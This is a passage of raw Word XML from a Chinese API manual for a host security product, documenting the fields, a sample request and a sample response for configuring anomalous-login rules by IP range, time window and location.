          <w:p w14:paraId="3707110F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25263F9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="17E737CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F818EB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="384C8900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B309745" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42281CD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP类型，1：普通IP/CIDR 2：IP段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BAE5775" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C548931" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721FEED8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E1AD0B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75C54328" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64F115A3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A5DFC25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="629EECB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05EBD0B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42B2EB13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B7A8109" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD7F0F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A44435E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57D94EDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B2FC01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05B52BD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>loginTimeInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="813"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3416"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="50AAE20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25F63FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708BEA67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42AC572C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6899003C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="45319EE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46AEE7E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F03B1A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BC355F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FC5E010" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始时间，如14：00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="740EC98B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BA9DCA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E820F16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E89AFD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="432B6D59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束时间，如18：20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E456B3C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7656CE02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2A0DF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1765FA6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E44BE4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>周期(周一到周日)，如[1,2,3,4,5,6,0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="782FBFC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginLocationInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4153"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C1AC81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ADD0D2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4FA075" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22CBA749" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DD5BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="604CB873" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A79FB6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64AFA132" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C7ED21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E0EF64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>国家</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5690C07D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4D0DE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>province</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="791B8054" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F170AE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22093707" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>省（当国家为中国以外时，该参数无需传入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="523FD8CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A35570D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B5946D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AFEA97F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46B96AB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>市（当国家为中国以外时，该参数无需传入）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="766D2702" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547E5F34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [22,33],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [“4735a8101f2847c6”,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>b439d8a7f96e37d7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIpInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>endStr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.0.10"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTimeInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "start": "09:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "end": "21:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "weeks": [1, 2, 3, 4, 5]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginLocationInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "country": "中国",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "province": "湖北省",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "city": "武汉市"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1721E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BCCB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79688A39"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BC669E" w14:paraId="346B152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A8BAA70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B165CBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F06E2A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79BF213D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42238A5A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B17338A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1420FBB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5065795D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEDD57A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="687F8126" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="281" w:name="_Toc115166215"/>
      <w:bookmarkStart w:id="282" w:name="查询单条规则-1"/>
      <w:bookmarkEnd w:id="280"/>
      <w:r>
        <w:t>查询单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="7E8A8291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录单条规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFE6DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
